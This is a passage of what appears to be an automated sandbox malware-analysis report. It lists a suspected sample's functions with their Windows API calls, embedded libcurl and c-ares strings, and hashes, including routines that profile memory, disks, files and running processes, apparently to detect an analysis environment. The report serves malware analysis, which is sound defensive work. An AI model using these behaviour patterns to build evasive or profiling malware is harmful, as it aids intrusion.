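        print(addr, sorted(apis_reachable(graph, addr)), resource_probes(graph, addr))
```

Paste the whole execution_graph line into GRAPH_EXCERPT and the same two functions work over all 249 nodes; the "N API calls" summaries point at callees whose own nodes appear elsewhere in the graph, so follow them by address rather than treating the summary text as an API name.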
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1497129879.0000000000C21000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C20000, based on PE: true
• Associated: 00000000.00000002.1497112310.0000000000C20000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1497129879.00000000011FD000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1497129879.0000000001361000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1497129879.0000000001363000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1497761383.0000000001366000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1497777692.0000000001368000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1497777692.00000000014F6000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1497777692.0000000001604000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1497777692.000000000160C000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1497777692.00000000016DE000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1497777692.00000000016E6000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1497777692.00000000016F5000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1498084907.00000000016F6000.00000080.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1498207505.00000000018AF000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1498224168.00000000018B1000.00000080.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_c20000_HZhObFuFNe.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: %s assess started=%d, result=%d$%s connect -> %d, connected=%d$%s connect timeout after %lldms, move on!$%s done$%s starting (timeout=%lldms)$%s trying next$Connected to %s (%s) port %u$Connection time-out$Connection timeout after %lld ms$Failed to connect to %s port %u after %lld ms: %s$all eyeballers failed$connect.c$created %s (timeout %lldms)$ipv4$ipv6
                                                            • API String ID: 0-1590685507
                                                            • Opcode ID: 0045df0a583e9e99e430bcbb08ccd23e589c2b460265516a5c773d20f383afb4
                                                            • Instruction ID: 4c596ed00dd1b71d54cfdefbcf95535789bc4d04ad03640f246c52c1922a0276
                                                            • Opcode Fuzzy Hash: 0045df0a583e9e99e430bcbb08ccd23e589c2b460265516a5c773d20f383afb4
                                                            • Instruction Fuzzy Hash: F2C2B135A043449FD728CF29C484B6AB7E1BF84314F15866DFC999B262D770EE89CB81

                                                            Control-flow Graph

                                                            APIs
                                                            • GetSystemInfo.KERNELBASE ref: 00C22579
                                                            • GlobalMemoryStatusEx.KERNELBASE ref: 00C225CC
                                                            • GetDriveTypeA.KERNELBASE ref: 00C22647
                                                            • GetDiskFreeSpaceExA.KERNELBASE ref: 00C2267E
                                                            • KiUserCallbackDispatcher.NTDLL ref: 00C227E2
                                                            • FindFirstFileW.KERNELBASE ref: 00C228F8
                                                            • FindNextFileW.KERNELBASE ref: 00C2291F
                                                            Strings
Memory Dump Source / Joe Sandbox IDA Plugin: same source file, associated dump files and snapshot file as listed for the function above.
                                                            Similarity
                                                            • API ID: FileFind$CallbackDiskDispatcherDriveFirstFreeGlobalInfoMemoryNextSpaceStatusSystemTypeUser
                                                            • String ID: @$`
                                                            • API String ID: 3271271169-3318628307
                                                            • Opcode ID: 71b8ca591d456131f8d326e70a65b458278f16b1ce447daf281188b8867524d1
                                                            • Instruction ID: 183177194a1fc18a348525825c895ddb921c62a0e0e83669fbd45fd33fdfdd71
                                                            • Opcode Fuzzy Hash: 71b8ca591d456131f8d326e70a65b458278f16b1ce447daf281188b8867524d1
                                                            • Instruction Fuzzy Hash: 47D1A4B49043199FCB10EFA8C58469EBBF4BF88344F40896DE898D7355E7349A84CF92

                                                            Control-flow Graph

                                                            control_flow_graph 1273 c229ff-c22a2f FindFirstFileA 1274 c22a31-c22a36 1273->1274 1275 c22a38 1273->1275 1276 c22a3d-c22a91 call 10a1150 call 10a11e0 RegOpenKeyExA 1274->1276 1275->1276 1281 c22a93-c22a98 1276->1281 1282 c22a9a 1276->1282 1283 c22a9f-c22b0c call 10a1150 call 10a11e0 CharUpperA call fa8da0 1281->1283 1282->1283 1291 c22b15 1283->1291 1292 c22b0e-c22b13 1283->1292 1293 c22b1a-c22b92 call 10a1150 call 10a11e0 call fa8e80 call fa8e70 1291->1293 1292->1293 1302 c22b94-c22ba3 1293->1302 1303 c22bcc-c22c66 QueryFullProcessImageNameA CloseHandle call fa8da0 1293->1303 1306 c22bb0-c22bc0 call fa8e68 1302->1306 1307 c22ba5-c22bae 1302->1307 1313 c22c68-c22c6d 1303->1313 1314 c22c6f 1303->1314 1310 c22bc5-c22bca 1306->1310 1307->1303 1310->1302 1310->1303 1315 c22c74-c22ce9 call 10a1150 call 10a11e0 call fa8e80 call fa8e70 1313->1315 1314->1315 1324 c22dcf-c22e1c call 10a1150 call 10a11e0 CloseHandle 1315->1324 1325 c22cef-c22d49 call fa8bb0 call fa8da0 1315->1325 1334 c22e23-c22e2e 1324->1334 1338 c22d4b-c22d63 call fa8da0 1325->1338 1339 c22d99-c22dad 1325->1339 1336 c22e30-c22e35 1334->1336 1337 c22e37 1334->1337 1340 c22e3c-c22ed6 call 10a1150 call 10a11e0 1336->1340 1337->1340 1338->1339 1346 c22d65-c22d7d call fa8da0 1338->1346 1339->1324 1355 c22eea 1340->1355 1356 c22ed8-c22ee1 1340->1356 1346->1339 1351 c22d7f-c22d97 call fa8da0 1346->1351 1351->1339 1357 c22daf-c22dc9 call fa8e68 1351->1357 1359 c22eef-c22f16 call 10a1150 call 10a11e0 1355->1359 1356->1355 1358 c22ee3-c22ee8 1356->1358 1357->1324 1357->1325 1358->1359
                                                            APIs
                                                            Strings
Memory Dump Source / Joe Sandbox IDA Plugin: same source file, associated dump files and snapshot file as listed for the first function above.
                                                            Similarity
                                                            • API ID: CloseHandle$CharFileFindFirstFullImageNameOpenProcessQueryUpper
                                                            • String ID: 0
                                                            • API String ID: 2406880114-4108050209
                                                            • Opcode ID: 9ba0260ac5a4cc8c62c6e2bd6c43b414af62bb19611038765090097227e988de
                                                            • Instruction ID: 5df5f0e0600869254e391e4c8f739d4dae720b14a70ea2c05880929e3d666642
                                                            • Opcode Fuzzy Hash: 9ba0260ac5a4cc8c62c6e2bd6c43b414af62bb19611038765090097227e988de
                                                            • Instruction Fuzzy Hash: E2E115B49043159FCB10EFA8D98469DBBF4AF84344F408969E899D7391E734DA84DF42

                                                             Control-flow Graph (graph not reproduced; entry block c305b0)
                                                            APIs
                                                            • WSAEventSelect.WS2_32(?,8508C483,?), ref: 00C30712
                                                            • WSAEventSelect.WS2_32(?,8508C483,00000000), ref: 00C309DC
                                                            • WSAEnumNetworkEvents.WS2_32(?,00000000,00000000), ref: 00C309FC
                                                            Strings
                                                            Similarity
                                                            • API ID: EventSelect$EnumEventsNetwork
                                                            • String ID: multi.c
                                                            • API String ID: 2170980988-214371023
                                                            • Opcode ID: ab836f8512b5a61b2e7793bf9b2751524aeff284206d2e06c48196d4ede4a830
                                                            • Instruction ID: be3c37cd01ba3915d01ea396c4ffad4c70e7c06909436f1881fdbc84f73c5341
                                                            • Opcode Fuzzy Hash: ab836f8512b5a61b2e7793bf9b2751524aeff284206d2e06c48196d4ede4a830
                                                            • Instruction Fuzzy Hash: 31D1F3726283019FE710DF24D8A1BAB77E9FF95304F14492CF89587242E774EA48DB92

                                                             Control-flow Graph (graph not reproduced; entry block ceb180)
                                                            APIs
                                                            • getsockname.WS2_32(-00000020,-00000020,?), ref: 00CEB2B7
                                                            Strings
                                                            Similarity
                                                            • API ID: getsockname
                                                            • String ID: ares__sortaddrinfo.c$cur != NULL
                                                            • API String ID: 3358416759-2430778319
                                                            • Opcode ID: 3a4d474a20deb872eff45977c3da1b57d7a935d5fded0f23c5d7a4e313b9aa44
                                                            • Instruction ID: a9ffde1addbfa5f2d1a1f0923b23018218adab490b34c674e065fb9eba85ae4a
                                                            • Opcode Fuzzy Hash: 3a4d474a20deb872eff45977c3da1b57d7a935d5fded0f23c5d7a4e313b9aa44
                                                            • Instruction Fuzzy Hash: A6C18B716053569FD718DF26C881A7B77E1EF88314F048828F8598B3A2DB34EE45DB81
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 878c906e3e738903c7fae4338495c0ae27ae91b363f23043b35f7fee776b6e1f
                                                            • Instruction ID: 70321f60e800f622cc685648469b1303a17582d8f1f861c13e3d9407a90edd2c
                                                            • Opcode Fuzzy Hash: 878c906e3e738903c7fae4338495c0ae27ae91b363f23043b35f7fee776b6e1f
                                                            • Instruction Fuzzy Hash: B49136B162D3098BD7358B29C8C47BBB2D5EFC4324F148B2CE8A9431D4EB759E40D681
                                                            APIs
                                                            • recvfrom.WS2_32(?,?,?,00000000,00001001,?,?,?,?,?,00CD712E,?,?,?,00001001,00000000), ref: 00CEA90D
                                                            Similarity
                                                            • API ID: recvfrom
                                                            • String ID:
                                                            • API String ID: 846543921-0
                                                            • Opcode ID: cd344a23ffefcd8144b4ba17041f18745a6ccc2af9117c153c6c7d90a0521f5b
                                                            • Instruction ID: b64e19a909e38d12b1dc337132ba80309e0ec4f299c14b80fe4267ee614a6aef
                                                            • Opcode Fuzzy Hash: cd344a23ffefcd8144b4ba17041f18745a6ccc2af9117c153c6c7d90a0521f5b
                                                            • Instruction Fuzzy Hash: 74F01D75118348AFD2209E42DC88D6BBBEDEFC9754F05495DF958132119271AE10CAB2
                                                            APIs
                                                            • RegOpenKeyExA.KERNELBASE(80000002,System\CurrentControlSet\Services\Tcpip\Parameters,00000000,00020019,?), ref: 00CDAA19
                                                            • RegQueryValueExA.KERNELBASE(?,SearchList,00000000,00000000,00000000,00000000), ref: 00CDAA4C
                                                            • RegQueryValueExA.KERNELBASE(?,SearchList,00000000,00000000,00000000,?), ref: 00CDAA97
                                                            • RegQueryValueExA.KERNELBASE(?,Domain,00000000,00000000,00000000,00000000), ref: 00CDAAE9
                                                            • RegQueryValueExA.KERNELBASE(?,Domain,00000000,00000000,00000000,?), ref: 00CDAB30
                                                            • RegCloseKey.KERNELBASE(?), ref: 00CDAB6A
                                                            • RegOpenKeyExA.KERNELBASE(80000002,Software\Policies\Microsoft\Windows NT\DNSClient,00000000,00020019,?), ref: 00CDAB82
                                                            • RegOpenKeyExA.KERNELBASE(80000002,Software\Policies\Microsoft\System\DNSClient,00000000,00020019,?), ref: 00CDAC46
                                                            • RegOpenKeyExA.KERNELBASE(80000002,System\CurrentControlSet\Services\Tcpip\Parameters\Interfaces,00000000,00020019,?), ref: 00CDAD0A
                                                            • RegEnumKeyExA.KERNELBASE ref: 00CDAD8D
                                                            • RegCloseKey.KERNELBASE(?), ref: 00CDADD9
                                                            • RegEnumKeyExA.KERNELBASE ref: 00CDAE08
                                                            • RegOpenKeyExA.KERNELBASE(?,?,00000000,00000001,?), ref: 00CDAE2A
                                                            • RegQueryValueExA.KERNELBASE(?,SearchList,00000000,00000000,00000000,00000000), ref: 00CDAE54
                                                            • RegQueryValueExA.KERNELBASE(?,Domain,00000000,00000000,00000000,00000000), ref: 00CDAF63
                                                            • RegQueryValueExA.KERNELBASE(?,Domain,00000000,00000000,00000000,?), ref: 00CDAFB2
                                                            • RegQueryValueExA.KERNELBASE(?,DhcpDomain,00000000,00000000,00000000,00000000), ref: 00CDB072
                                                            Strings
                                                            Similarity
                                                            • API ID: QueryValue$Open$CloseEnum
                                                            • String ID: DhcpDomain$Domain$PrimaryDNSSuffix$SearchList$Software\Policies\Microsoft\System\DNSClient$Software\Policies\Microsoft\Windows NT\DNSClient$System\CurrentControlSet\Services\Tcpip\Parameters$System\CurrentControlSet\Services\Tcpip\Parameters\Interfaces
                                                            • API String ID: 4217438148-1047472027
                                                            • Opcode ID: b216bebb6d1f0480cd730a97a94ee7143a5b7ee554bf52d303f6088af4ad3df8
                                                            • Instruction ID: 910b367dbbb1f3860ff78ac2bd2b68d01010786b1561113424c233ecd5231af6
                                                            • Opcode Fuzzy Hash: b216bebb6d1f0480cd730a97a94ee7143a5b7ee554bf52d303f6088af4ad3df8
                                                            • Instruction Fuzzy Hash: 7B72DDB1604341ABE320DB24DC81B6BBBE8EF85700F14582DFA9597391EB75E944CB63
                                                            APIs
                                                            • setsockopt.WS2_32(?,00000006,00000001,00000001,00000004), ref: 00C5A832
                                                            Strings
                                                            • Trying [%s]:%d..., xrefs: 00C5A689
                                                            • Couldn't bind to interface '%s' with errno %d: %s, xrefs: 00C5AD0A
                                                            • cf_socket_open() -> %d, fd=%d, xrefs: 00C5A796
                                                            • Local Interface %s is ip %s using address family %i, xrefs: 00C5AE60
                                                            • Trying %s:%d..., xrefs: 00C5A7C2, 00C5A7DE
                                                            • @, xrefs: 00C5AC42
                                                            • Couldn't bind to '%s' with errno %d: %s, xrefs: 00C5AE1F
                                                            • Could not set TCP_NODELAY: %s, xrefs: 00C5A871
                                                            • Local port: %hu, xrefs: 00C5AF28
                                                            • Name '%s' family %i resolved to '%s' family %i, xrefs: 00C5ADAC
                                                            • bind failed with errno %d: %s, xrefs: 00C5B080
                                                            • cf-socket.c, xrefs: 00C5A5CD, 00C5A735
                                                            • Bind to local port %d failed, trying next, xrefs: 00C5AFE5
                                                            • sa_addr inet_ntop() failed with errno %d: %s, xrefs: 00C5A6CE
                                                            • @, xrefs: 00C5A8F4
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1497129879.0000000000C21000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C20000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_c20000_HZhObFuFNe.jbxd
                                                            Similarity
                                                            • API ID: setsockopt
                                                            • String ID: Trying %s:%d...$ Trying [%s]:%d...$ @$ @$Bind to local port %d failed, trying next$Could not set TCP_NODELAY: %s$Couldn't bind to '%s' with errno %d: %s$Couldn't bind to interface '%s' with errno %d: %s$Local Interface %s is ip %s using address family %i$Local port: %hu$Name '%s' family %i resolved to '%s' family %i$bind failed with errno %d: %s$cf-socket.c$cf_socket_open() -> %d, fd=%d$sa_addr inet_ntop() failed with errno %d: %s
                                                            • API String ID: 3981526788-2373386790
                                                            • Opcode ID: 98a000ebc66e53dd0bb31d493b91eb563e959b03e153e1495f8eacb05fd8fa0a
                                                            • Instruction ID: 13c4f1f491a075259820587d68ffb2bd842b84d1fadb2922d7dcf4233cc8915d
                                                            • Opcode Fuzzy Hash: 98a000ebc66e53dd0bb31d493b91eb563e959b03e153e1495f8eacb05fd8fa0a
                                                            • Instruction Fuzzy Hash: 28622574508380ABE720CF15C846BABB7E4FF94305F044A19FD9897292E771E988CB93

                                                            Control-flow Graph

                                                            APIs
                                                            • RegOpenKeyExA.KERNELBASE(80000002,System\CurrentControlSet\Services\Tcpip\Parameters,00000000,00020019,?), ref: 00CE9946
                                                            • RegQueryValueExA.KERNELBASE(?,DatabasePath,00000000,00000000,?,00000104), ref: 00CE9974
                                                            • RegCloseKey.KERNELBASE(?), ref: 00CE998B
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1497129879.0000000000C21000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C20000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_c20000_HZhObFuFNe.jbxd
                                                            Similarity
                                                            • API ID: CloseOpenQueryValue
                                                            • String ID: #$#$CARES_HOSTS$DatabasePath$System\CurrentControlSet\Services\Tcpip\Parameters$\hos$sts
                                                            • API String ID: 3677997916-4129964100
                                                            • Opcode ID: 17295c9a76351156a8433828c274d237082754e690347d3887947470f80fce35
                                                            • Instruction ID: 67a87f39606ab1268fd64232a3bf1394836f1992c19fcec5aaa9f4be917ebd6a
                                                            • Opcode Fuzzy Hash: 17295c9a76351156a8433828c274d237082754e690347d3887947470f80fce35
                                                            • Instruction Fuzzy Hash: AF32C7F5904241ABEB11AB22EC42A1B76E8EF54354F084439F9199A363FB31EE14E753

                                                            Control-flow Graph

                                                            APIs
                                                            • connect.WS2_32(?,?,00000001), ref: 00C58C2F
                                                            • SleepEx.KERNELBASE(00000000,00000000), ref: 00C58CF3
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1497129879.0000000000C21000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C20000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_c20000_HZhObFuFNe.jbxd
                                                            Similarity
                                                            • API ID: Sleepconnect
                                                            • String ID: cf-socket.c$connect to %s port %u from %s port %d failed: %s$connected$local address %s port %d...$not connected yet
                                                            • API String ID: 238548546-879669977
                                                            • Opcode ID: 1b7a34b3b8ec0714dc0c0b54e82508e5b88729cbbfc603261268c6c34aef2cb1
                                                            • Instruction ID: 22d8d0aa45e005b8e925a24b3193b93d6c820bbcfefef480457b24e6eaef6b92
                                                            • Opcode Fuzzy Hash: 1b7a34b3b8ec0714dc0c0b54e82508e5b88729cbbfc603261268c6c34aef2cb1
                                                            • Instruction Fuzzy Hash: 09B1DF78604706AFE710CF24CC85BA6B7E4AF45315F14892CEC696B2D2DB70E98CCB65

                                                            Control-flow Graph

                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1497129879.0000000000C21000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C20000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_c20000_HZhObFuFNe.jbxd
                                                            Similarity
                                                            • API ID: EnumOpen
                                                            • String ID: d
                                                            • API String ID: 3231578192-2564639436
                                                            • Opcode ID: 42a96cde9c1bfc4d62c2d4384ec1838a74fb74ff1e6720d69cb9570a0baa13bd
                                                            • Instruction ID: c53900a681b45a4724db96496d566361be674b6404fcb044c785b7e4bd569f86
                                                            • Opcode Fuzzy Hash: 42a96cde9c1bfc4d62c2d4384ec1838a74fb74ff1e6720d69cb9570a0baa13bd
                                                            • Instruction Fuzzy Hash: 9771A3B490431A9FDB50DFA9D58479EBBF0FF84308F00895DE89897345D7749A888F92

                                                            Control-flow Graph

                                                            APIs
                                                            • WSAIoctl.WS2_32(?,4004747B,00000000,00000000,?,00000004,?,00000000,00000000), ref: 00C5935C
                                                            • setsockopt.WS2_32(?,0000FFFF,00001001,00000000,00000004,?,00000004,?,00000000,00000000), ref: 00C59389
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1497129879.0000000000C21000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C20000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_c20000_HZhObFuFNe.jbxd
                                                            Similarity
                                                            • API ID: Ioctlsetsockopt
                                                            • String ID: Send failure: %s$cf-socket.c$send(len=%zu) -> %d, err=%d
                                                            • API String ID: 1903391676-2691795271
                                                            • Opcode ID: 457fc987c13805a50e2e52c60b1a4954ff1039a94b33133ad877d11d1de87fd4
                                                            • Instruction ID: a418c3e75130cb5e94e9e6e5659935ac8c5d1cd9eda2f9cb56c0f1e536f710ec
                                                            • Opcode Fuzzy Hash: 457fc987c13805a50e2e52c60b1a4954ff1039a94b33133ad877d11d1de87fd4
                                                            • Instruction Fuzzy Hash: 4A510274600305EFEB10DF24C881FAAB7A5FF88314F148568FD589B292E730EA95CB91

                                                            Control-flow Graph: function c276a0-c27762; API node c276e6-c276f2 (send); internal calls to c272a0, c2cb20, fa8c50. Graph layout data omitted.
                                                            APIs
                                                            • send.WS2_32(multi.c,?,?,?,00C23D4E,00000000,?,?,00C307BF), ref: 00C276EB
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1497129879.0000000000C21000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C20000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_c20000_HZhObFuFNe.jbxd
                                                            Similarity
                                                            • API ID: send
                                                            • String ID: LIMIT %s:%d %s reached memlimit$SEND %s:%d send(%lu) = %ld$multi.c$send
                                                            • API String ID: 2809346765-3388739168
                                                            • Opcode ID: 54e78a950ef243c7faa5c8546259ff8e6302277a1180d7ac537c33738bc87f4d
                                                            • Instruction ID: fb075ac4c12bb61d23a7df0534e88c6a117e0511974e816bcaf6422c5e67d9a1
                                                            • Opcode Fuzzy Hash: 54e78a950ef243c7faa5c8546259ff8e6302277a1180d7ac537c33738bc87f4d
                                                            • Instruction Fuzzy Hash: F511C4F5A293247BD6219A16ACCAE2B3B5CDBC2F68F450B09BC0917243E5619D41C6B2

                                                            Control-flow Graph: function c27770-c27832; API node c277b6-c277c2 (recv); internal calls to c272a0, c2cb20, fa8c50. Graph layout data omitted.
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1497129879.0000000000C21000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C20000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_c20000_HZhObFuFNe.jbxd
                                                            Similarity
                                                            • API ID: recv
                                                            • String ID: LIMIT %s:%d %s reached memlimit$RECV %s:%d recv(%lu) = %ld$recv
                                                            • API String ID: 1507349165-640788491
                                                            • Opcode ID: 4e75e6f5724c17e1542a4610a2b2d73f9a3485efc640606062a921aa6a739bae
                                                            • Instruction ID: f095ab00c13aadd4243f356b8e1b411b521c413fc061d9931fa1e6eb53c0df7d
                                                            • Opcode Fuzzy Hash: 4e75e6f5724c17e1542a4610a2b2d73f9a3485efc640606062a921aa6a739bae
                                                            • Instruction Fuzzy Hash: 451127F5A183647BE6219A11FC8AE273B9CDB86F68F050B1CBC0923343D2619C00C6B2

                                                            Control-flow Graph: function c275e0-c27699; API node c27607-c27629 (socket); internal calls to c272a0, c2cb20, fa8c50. Graph layout data omitted.
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1497129879.0000000000C21000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C20000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_c20000_HZhObFuFNe.jbxd
                                                            Similarity
                                                            • API ID: socket
                                                            • String ID: FD %s:%d socket() = %d$LIMIT %s:%d %s reached memlimit$socket
                                                            • API String ID: 98920635-842387772
                                                            • Opcode ID: dc9a6198a4048ec99562b05b7f9c10b4d26ed79c8004d946ba744568928bad8d
                                                            • Instruction ID: 7c94f00f230c553c73d37d853b17efe7685c5fa97a2d22aecd448fe23dacc4a0
                                                            • Opcode Fuzzy Hash: dc9a6198a4048ec99562b05b7f9c10b4d26ed79c8004d946ba744568928bad8d
                                                            • Instruction Fuzzy Hash: 24118CB2A5032177DF216669BC9AF8B3B8CDF82B78F040B14F82853283D2218C91C3D1

                                                            Control-flow Graph: function c5a150-c5a250; API node c5a181-c5a1ce (getsockname); internal calls to c5ef30, c3d090, c64f40. Graph layout data omitted.
                                                            APIs
                                                            • getsockname.WS2_32(?,?,00000080), ref: 00C5A1C7
                                                            Strings
                                                            • getsockname() failed with errno %d: %s, xrefs: 00C5A1F0
                                                            • ssloc inet_ntop() failed with errno %d: %s, xrefs: 00C5A23B
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1497129879.0000000000C21000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C20000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_c20000_HZhObFuFNe.jbxd
                                                            Similarity
                                                            • API ID: getsockname
                                                            • String ID: getsockname() failed with errno %d: %s$ssloc inet_ntop() failed with errno %d: %s
                                                            • API String ID: 3358416759-2605427207
                                                            • Opcode ID: 9d3121a31ed22f8a9de007a81454dbfc04a6d09bfae081e821753815871d8fd3
                                                            • Instruction ID: 0f7bf13ed3bb48bdcc0de06c9e23ef4096dec339729a65e0d532377f6d474d68
                                                            • Opcode Fuzzy Hash: 9d3121a31ed22f8a9de007a81454dbfc04a6d09bfae081e821753815871d8fd3
                                                            • Instruction Fuzzy Hash: 5921F871818680AAE7259B19EC47FE773ACEF91324F000614FD9853051FB326A8987E6

                                                            Control-flow Graph: function c3d5e0-c3d68d; API node c3d652-c3d662 (WSAStartup); internal calls to c3d690, c47620. Graph layout data omitted.
                                                            APIs
                                                            • WSAStartup.WS2_32(00000202), ref: 00C3D65B
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1497129879.0000000000C21000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C20000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_c20000_HZhObFuFNe.jbxd
                                                            Similarity
                                                            • API ID: Startup
                                                            • String ID: if_nametoindex$iphlpapi.dll
                                                            • API String ID: 724789610-3097795196
                                                            • Opcode ID: c155260e546116b7569fe9e99a29194fde8c037f06f550a9db8beba201f6a550
                                                            • Instruction ID: 51678d65bfe6dd6a6ab194a0aa3c65978549cf68021aa8f269929b23d15dd35c
                                                            • Opcode Fuzzy Hash: c155260e546116b7569fe9e99a29194fde8c037f06f550a9db8beba201f6a550
                                                            • Instruction Fuzzy Hash: 5B0176D096034042F7227B38A81B36621A46B51704F850D6CEC69831C3F728C698C3D3

                                                            Control-flow Graph: function ceaa30-ceaf1f; API nodes ceab96-ceabab (socket), ceabd0-ceabed (ioctlsocket), ceada0-ceadae (connect); internal calls to cde730, cdea60, cdebf0, ceaf70, cde760, cde7c0, cde180. Graph layout data omitted.
                                                            APIs
                                                            • socket.WS2_32(FFFFFFFF,?,00000000), ref: 00CEAB9B
                                                            • ioctlsocket.WS2_32(00000000,8004667E,00000001), ref: 00CEABE3
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1497129879.0000000000C21000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C20000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_c20000_HZhObFuFNe.jbxd
                                                            Similarity
                                                            • API ID: ioctlsocketsocket
                                                            • String ID:
                                                            • API String ID: 416004797-0
                                                            • Opcode ID: bcb422d6a47fcd82878d3d42e24a9b3595c1a945ad7e399d08ab0876ce429e4c
                                                            • Instruction ID: f0616c95ff7b4b8597c965dc7e416a2d2b114c45ebbca8d8f7d91f4c2822891e
                                                            • Opcode Fuzzy Hash: bcb422d6a47fcd82878d3d42e24a9b3595c1a945ad7e399d08ab0876ce429e4c
                                                            • Instruction Fuzzy Hash: 20E1D0706003819FEB20CF26C885B6B77E5EF85310F144A2DF9A88B291D775EE54CB92
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1497129879.0000000000C21000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C20000, based on PE: true
                                                            • Associated: 00000000.00000002.1497112310.0000000000C20000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1497129879.00000000011FD000.00000040.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1497129879.0000000001361000.00000040.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1497129879.0000000001363000.00000040.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1497761383.0000000001366000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1497777692.0000000001368000.00000040.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1497777692.00000000014F6000.00000040.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1497777692.0000000001604000.00000040.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1497777692.000000000160C000.00000040.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1497777692.00000000016DE000.00000040.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1497777692.00000000016E6000.00000040.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1497777692.00000000016F5000.00000040.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1498084907.00000000016F6000.00000080.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1498207505.00000000018AF000.00000040.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1498224168.00000000018B1000.00000080.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_c20000_HZhObFuFNe.jbxd
                                                            Similarity
                                                            • API ID: closesocket
                                                            • String ID: FD %s:%d sclose(%d)
                                                            • API String ID: 2781271927-3116021458
                                                            • Opcode ID: 88be6b25509967622417b90c0ca497f9cfd1ba2c8247b8ef339cda839d30eb39
                                                            • Instruction ID: f920a8a370a2fea3faf2815d04d623cd4297fbcac30d0e32ac30d78932aca34e
                                                            • Opcode Fuzzy Hash: 88be6b25509967622417b90c0ca497f9cfd1ba2c8247b8ef339cda839d30eb39
                                                            • Instruction Fuzzy Hash: FAD05E3290A231AB8A316999BC89C5B6AA89EC6F20B0A0A5DF95477205D2209C4187E2
                                                            APIs
                                                            • connect.WS2_32(-00000028,-00000028,-00000028,-00000001,-00000028,?,-00000028,00CEB29E,?,00000000,?,?), ref: 00CEB0BA
